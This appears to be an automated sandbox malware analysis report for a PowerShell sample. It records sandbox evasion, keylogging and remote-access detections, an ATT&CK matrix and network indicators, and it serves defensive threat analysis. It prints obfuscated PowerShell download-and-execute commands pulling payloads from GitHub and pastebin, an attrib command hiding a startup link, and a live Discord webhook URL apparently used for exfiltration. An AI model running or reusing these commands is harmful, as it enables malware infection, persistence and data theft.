              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: powershell.exe, 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E860795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3642
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6208
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 634
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1048
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6093
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3654
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5329
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4334
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1091
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4518
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5229
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4120 Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004 Thread sleep count: 634 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3372 Thread sleep count: 1048 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2836 Thread sleep count: 138 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3360 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 988 Thread sleep count: 6093 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460 Thread sleep count: 3654 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312 Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2124 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6324 Thread sleep time: -23980767295822402s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4700 Thread sleep count: 1091 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4980 Thread sleep count: 106 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3100 Thread sleep count: 191 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 4518 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424 Thread sleep time: -17524406870024063s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5116 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4976 Thread sleep count: 5229 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File Volume queried: C:\ FullSizeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
              Source: powershell.exe, 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CheckForVMwareAndVirtualBox
              Source: powershell.exe, 00000001.00000002.1928170123.0000020AB28F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2130220731.0000027342840000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2228460086.00000188F77FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: 1.2.powershell.exe.20a9bee0600.1.raw.unpack, MyUtilityClass.cs Reference to suspicious API methods: LoadLibrary(libraryName)
              Source: 1.2.powershell.exe.20a9bee0600.1.raw.unpack, MyUtilityClass.cs Reference to suspicious API methods: GetProcAddress(intPtr, procName)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, Messages.cs Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
              Source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, XLogger.cs Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex (iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt -usebasicparsing)
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5818.tmp" "c:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A1.tmp" "c:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

              Source: Yara match, File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara match, File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: powershell.exe, 0000000D.00000002.2813899704.000001E877A21000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2813899704.000001E8779D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2729093893.000001E85DA98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CE5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2729093893.000001E85DA90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2817477632.000001E877CBC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5584, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e877e60000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 13.2.powershell.exe.1e8602f8028.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000D.00000002.2820330818.000001E877E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000D.00000002.2732958403.000001E85F93F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5584, type: MEMORYSTR

              MITRE ATT&CK Matrix (the number in parentheses is the count the report shows beside each technique):

              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (131) | Scheduled Task/Job (1) | Process Injection (11) | Masquerading (1) | Input Capture (1) | Security Software Discovery (241) | Remote Services | Input Capture (1) | Web Service (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | Registry Run Keys / Startup Folder (11) | Scheduled Task/Job (1) | Virtualization/Sandbox Evasion (141) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Archive Collected Data (11) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | Native API (1) | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (11) | Process Injection (11) | Security Account Manager | Virtualization/Sandbox Evasion (141) | SMB/Windows Admin Shares | Data from Network Shared Drive | Ingress Tool Transfer (3) | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | PowerShell (2) | Login Hook | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (4) | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Obfuscated Files or Information (11) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Application Layer Protocol (115) | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Software Packing (2) | Cached Domain Credentials | System Information Discovery (24) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | DLL Side-Loading (1) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              Behavior Graph (flattened from the report's graph view; node numbers are the graph's own node IDs):

              Behavior Graph ID: 1534105 | Sample: cr_asm_hiddenz.ps1 | Startdate: 15/10/2024 | Architecture: WINDOWS | Score: 100
              Root (node 2):
              • DNS/IP: pastebin.com (node 59), raw.githubusercontent.com (node 61), discord.com (node 63)
              • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
              • pastebin.com (node 59): Connects to a pastebin service (likely for C&C)
              • Started: powershell.exe 1 31 (node 9), forfiles.exe 1 (node 14), forfiles.exe (node 16)
              powershell.exe 1 31 (node 9):
              • DNS/IP: discord.com 162.159.138.232, 443, 49712, 49722 CLOUDFLARENETUS United States (node 69)
              • Dropped: C:\Users\user\AppData\...\thvmfbzv.cmdline, Unicode (node 55); C:\ProgramData\...\BeginSync.lnk, MS (node 57)
              • Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Suspicious powershell command line found; Tries to open files direct via NTFS file id; Powershell creates an autostart link
              • Started: powershell.exe 20 (node 18), csc.exe 3 (node 22), conhost.exe (node 25), attrib.exe 1 (node 27)
              forfiles.exe 1 (node 14): started powershell.exe 7 (node 29), conhost.exe 1 (node 31)
              forfiles.exe (node 16): started powershell.exe (node 33), conhost.exe (node 35)
              powershell.exe 20 (node 18):
              • DNS/IP: 45.144.31.105, 443, 49726, 49728 HQservCommunicationSolutionsIL United Kingdom (node 65); 104.20.3.235, 443, 49724, 49725 CLOUDFLARENETUS United States (node 67)
              • Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Binary or sample is protected by dotNetProtector
              • Started: csc.exe (node 37), conhost.exe (node 40)
              csc.exe 3 (node 22): dropped C:\Users\user\AppData\Local\...\thvmfbzv.dll, PE32 (node 53); started cvtres.exe 1 (node 42)
              powershell.exe 7 (node 29): Suspicious powershell command line found; started powershell.exe 14 13 (node 44)
              powershell.exe (node 33): started powershell.exe (node 47)
              csc.exe (node 37): dropped C:\Users\user\AppData\Local\...\s4dvafav.dll, PE32 (node 51); started cvtres.exe (node 49)
              powershell.exe 14 13 (node 44): DNS/IP: raw.githubusercontent.com 185.199.111.133, 443, 49713, 49714 FASTLYUS Netherlands (node 71); pastebin.com 172.67.19.24, 443, 49710, 49711 CLOUDFLARENETUS United States (node 73)

              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              discord.com | 162.159.138.232 | true | true | | unknown
              raw.githubusercontent.com | 185.199.111.133 | true | true | | unknown
              pastebin.com | 172.67.19.24 | true | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://discord.com/api/webhooks/1286410676377489529/IzHkrSq-pjbL-xAImQ3lHIpYzCTAy9OyxtjHyAVpG4xY-CaU9vyM9tnzyvVTAKfrFOSG | true | | unknown
              https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt | false | | unknown
